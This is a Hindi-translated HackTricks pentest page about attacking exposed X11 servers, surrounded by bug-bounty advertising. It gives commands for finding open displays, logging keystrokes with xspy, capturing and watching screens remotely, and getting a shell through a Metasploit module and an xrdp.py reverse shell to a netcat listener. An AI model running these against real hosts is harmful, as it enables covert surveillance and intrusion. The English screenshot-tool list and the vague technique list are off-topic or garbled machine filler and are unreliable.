hacktricks/network-services-pentesting/6000-pentesting-x11.md
Translator workflow 75e8745ba3 Translated to Hindi
2023-11-06 08:38:02 +00:00

17 KiB
Raw Blame History

6000 - पेंटेस्टिंग X11

☁️ HackTricks Cloud ☁️ -🐦 Twitter 🐦 - 🎙️ Twitch 🎙️ - 🎥 Youtube 🎥

HackenProof सभी क्रिप्टो बग बाउंटी के लिए घर है।

देरी के बिना पुरस्कार प्राप्त करें
HackenProof बाउंटी तभी शुरू होती हैं जब उनके ग्राहक इनाम बजट जमा करते हैं। बग सत्यापित होने के बाद आपको इनाम मिलेगा।

वेब3 पेंटेस्टिंग में अनुभव प्राप्त करें
ब्लॉकचेन प्रोटोकॉल और स्मार्ट कॉन्ट्रैक्ट्स नई इंटरनेट हैं! उनके उभरते दिनों में वेब3 सुरक्षा को मास्टर करें।

वेब3 हैकर लीजेंड बनें
प्रत्येक सत्यापित बग के साथ प्रतिष्ठा अंक प्राप्त करें और साप्ताहिक लीडरबोर्ड के शीर्ष पर विजयी बनें।

HackenProof पर साइन अप करें और अपने हैक्स से कमाई करें!

{% embed url="https://hackenproof.com/register" %}

मूलभूत जानकारी

एक्स विंडो सिस्टम (या एक्स) बिटमैप डिस्प्ले के लिए एक विंडो सिस्टम है, जो UNIX आधारित ऑपरेटिंग सिस्टम पर सामान्य है। एक्स एक जीयूआई आधारित पर्यावरण के लिए मूल ढांचा प्रदान करता है। एक्स भी उपयोगकर्ता इंटरफ़ेस को निर्दिष्ट नहीं करता है - व्यक्तिगत कार्यक्रम इसे संभालते हैं।
स्रोत: https://resources.infosecinstitute.com/exploiting-x11-unauthenticated-access/#gref

डिफ़ॉल्ट पोर्ट: 6000

PORT       STATE   SERVICE
6000/tcp   open    X11

जांच

अनामत जुड़ाव की जांच करें:

nmap -sV --script x11-access -p <PORT> <IP>
msf> use auxiliary/scanner/x11/open_x11

स्थानीय जाँच

उपयोगकर्ता के होम फ़ोल्डर में फ़ाइल .Xauthority को X11 के लिए प्रमाणीकरण के लिए उपयोग किया जाता है। यहाँ से:

MIT-magic-cookie-1: 128 बिट की कुंजी ("कुकी") उत्पन्न करना, इसे ~/.Xauthority (या जहां XAUTHORITY envvar इंट पॉइंट करता है) में संग्रहीत करना। क्लाइंट इसे सर्वर को सादा भेजता है! सर्वर यह जांचता है कि क्या उसके पास इस "कुकी" की एक प्रति है और यदि हां, तो कनेक्शन अनुमति दी जाती है। कुंजी DMX द्वारा उत्पन्न की जाती है।

{% hint style="warning" %} कुकी का उपयोग करने के लिए आपको इन्वार वार्ता सेट करनी चाहिए: export XAUTHORITY=/path/to/.Xauthority {% endhint %}

कनेक्शन सत्यापन करें

xdpyinfo -display <ip>:<display>
xwininfo -root -tree -display <IP>:<display> #Ex: xwininfo -root -tree -display 10.5.5.12:0

कीलॉगिंग

xspy कीबोर्ड की टाइपिंग को स्निफ करने के लिए।

नमूना आउटपुट:

xspy 10.9.xx.xx

opened 10.9.xx.xx:0 for snoopng
swaBackSpaceCaps_Lock josephtTabcBackSpaceShift_L workShift_L 2123
qsaminusKP_Down KP_Begin KP_Down KP_Left KP_Insert TabRightLeftRightDeletebTabDownnTabKP_End KP_Right KP_Up KP_Down KP_Up KP_Up TabmtminusdBackSpacewinTab

स्क्रीनशॉट कैप्चरिंग

To capture screenshots during a penetration test, you can use various tools and techniques. Here are some common methods:

1. Scrot

Scrot is a command-line tool that allows you to capture screenshots in Linux. You can install it using the following command:

sudo apt-get install scrot

To capture a screenshot, simply run the following command:

scrot screenshot.png

This will save the screenshot as screenshot.png in the current directory.

2. Shutter

Shutter is a feature-rich screenshot tool for Linux. You can install it using the following command:

sudo apt-get install shutter

Once installed, you can launch Shutter from the applications menu. It provides a graphical interface to capture screenshots and offers various editing options.

3. Flameshot

Flameshot is another popular screenshot tool for Linux. You can install it using the following command:

sudo apt-get install flameshot

To capture a screenshot, run the following command:

flameshot gui

This will open a graphical interface where you can capture and edit screenshots.

4. Snipping Tool (Windows)

If you are using Windows, you can use the built-in Snipping Tool to capture screenshots. Simply search for "Snipping Tool" in the Start menu and launch the application. It allows you to capture screenshots of selected areas or the entire screen.

5. Grab (macOS)

On macOS, you can use the built-in Grab tool to capture screenshots. You can find it in the Utilities folder, which is located in the Applications folder. Grab provides options to capture the entire screen, a specific window, or a selected area.

These are just a few examples of tools you can use to capture screenshots during a penetration test. Choose the one that best suits your needs and preferences.

xwd -root -screen -silent -display <TargetIP:0> > screenshot.xwd
convert screenshot.xwd screenshot.png

रिमोट डेस्कटॉप दृश्य

यात्रा से: https://resources.infosecinstitute.com/exploiting-x11-unauthenticated-access/#gref

./xrdp.py <IP:0>

यहां से: https://bitvijays.github.io/LFF-IPS-P2-VulnerabilityAnalysis.html

सबसे पहले हमें xwininfo का उपयोग करके विंडो की ID ढूंढ़नी होगी।

xwininfo -root -display 10.9.xx.xx:0

xwininfo: Window id: 0x45 (the root window) (has no name)

Absolute upper-left X:  0
Absolute upper-left Y:  0
Relative upper-left X:  0
Relative upper-left Y:  0
Width: 1024
Height: 768
Depth: 16
Visual: 0x21
Visual Class: TrueColor
Border width: 0
Class: InputOutput
Colormap: 0x20 (installed)
Bit Gravity State: ForgetGravity
Window Gravity State: NorthWestGravity
Backing Store State: NotUseful
Save Under State: no
Map State: IsViewable
Override Redirect State: no
Corners:  +0+0  -0+0  -0-0  +0-0
-geometry 1024x768+0+0

XWatchwin

लाइव देखें के लिए हमें उपयोग करना होगा

./xwatchwin [-v] [-u UpdateTime] DisplayName { -w windowID | WindowName } -w window Id is the one found on xwininfo
./xwatchwin 10.9.xx.xx:0 -w 0x45

शैल प्राप्त करें

To get a shell on a target system, you can exploit vulnerabilities in the X11 server. Here are some techniques you can use:

1. X11 Forwarding

If the target system has X11 forwarding enabled, you can use it to run X11 applications remotely and potentially gain access to a shell. To do this, you need to have X11 forwarding enabled on your own system and establish a connection to the target system using SSH with X11 forwarding enabled.

2. X11 Injection

X11 injection involves injecting malicious code into a legitimate X11 application running on the target system. This can be done by exploiting vulnerabilities in the application or by intercepting and modifying the X11 protocol traffic between the client and server.

3. X11 Server Exploitation

If the target system is running an outdated or vulnerable X11 server, you can exploit known vulnerabilities to gain unauthorized access. This can involve exploiting buffer overflows, privilege escalation vulnerabilities, or other weaknesses in the X11 server software.

4. X11 Port Forwarding

X11 port forwarding allows you to forward X11 traffic from the target system to your own system. This can be useful if you want to access X11 applications running on the target system or if you want to exploit vulnerabilities in the X11 server.

Remember, when attempting to get a shell on a target system, it is important to ensure that you have proper authorization and are conducting the activity within the boundaries of the law.

msf> use exploit/unix/x11/x11_keyboard_exec

दूसरा तरीका:

रिवर्स शेल: Xrdp नेटकैट के माध्यम से रिवर्स शेल लेने की भी सुविधा प्रदान करता है। निम्नलिखित कमांड टाइप करें:

./xrdp.py <IP:0> no-disp

यह एक नया नियंत्रण पटल प्रदर्शित करेगा जहां हम R-शेल विकल्प देख सकते हैं, जो नीचे दिखाया गया है:

हम अपने स्थानीय सिस्टम में पोर्ट 5555 पर नेटकैट सुनने की स्थिति शुरू करेंगे, जो नीचे दिखाया गया है:

फिर IP और पोर्ट जोड़ें और फिर R-शेल का चयन करें, जो नीचे दिखाया गया है:

अब नीचे दिखाए गए तस्वीर में हमारे पास पूरी सिस्टम एक्सेस है:

{% embed url="https://resources.infosecinstitute.com/exploiting-x11-unauthenticated-access/#gref" %}

शोडन

  • port:6000 x11

HackenProof क्रिप्टो बग बाउंटी का घर है।

देरी के बिना पुरस्कार प्राप्त करें
HackenProof बाउंटी केवल तब शुरू होती है जब उनके ग्राहक पुरस्कार बजट जमा करते हैं। आपको पुरस्कार उस बग के सत्यापित होने के बाद मिलेगा।

वेब3 पेंटेस्टिंग में अनुभव प्राप्त करें
ब्लॉकचेन प्रोटोकॉल और स्मार्ट कॉन्ट्रैक्ट्स नई इंटरनेट हैं! इसके उभरते दिनों में वेब3 सुरक्षा को मास्टर करें।

वेब3 हैकर लीजेंड बनें
प्रत्येक सत्यापित बग के साथ प्रतिष्ठा अंक प्राप्त करें और साप्ताहिक लीडरबोर्ड के शीर्ष पर विजयी बनें।

HackenProof पर साइन अप करें और अपने हैक्स से कमाई करना शुरू करें!

{% embed url="https://hackenproof.com/register" %}

☁️ HackTricks Cloud ☁️ -🐦 Twitter 🐦 - 🎙️ Twitch 🎙️ - 🎥 Youtube 🎥
  • क्या आप किसी साइबर सुरक्षा कंपनी में काम करते हैं? क्या आप चाहते हैं कि आपकी कंपनी HackTricks में विज्ञापित हो? या क्या आप PEASS के नवीनतम संस्करण देखना चाहते हैं या HackTricks को PDF में डाउनलोड करना चाहते हैं? सदस्यता योजनाएं की जांच करें!
  • The PEASS Family की खोज करें, हमारा विशेष NFT संग्रह
  • आधिकारिक PEASS & HackTricks swag प्राप्त करें
  • शामिल हों 💬 Discord समूह या टेलीग्राम समूह या मुझे ट्विटर 🐦@carlospolopm** का** अनुसरण करें।
  • अपने हैकिंग ट्रिक्स साझा करें, PR करके hacktricks repo और hacktricks-cloud repo में सबमिट करके।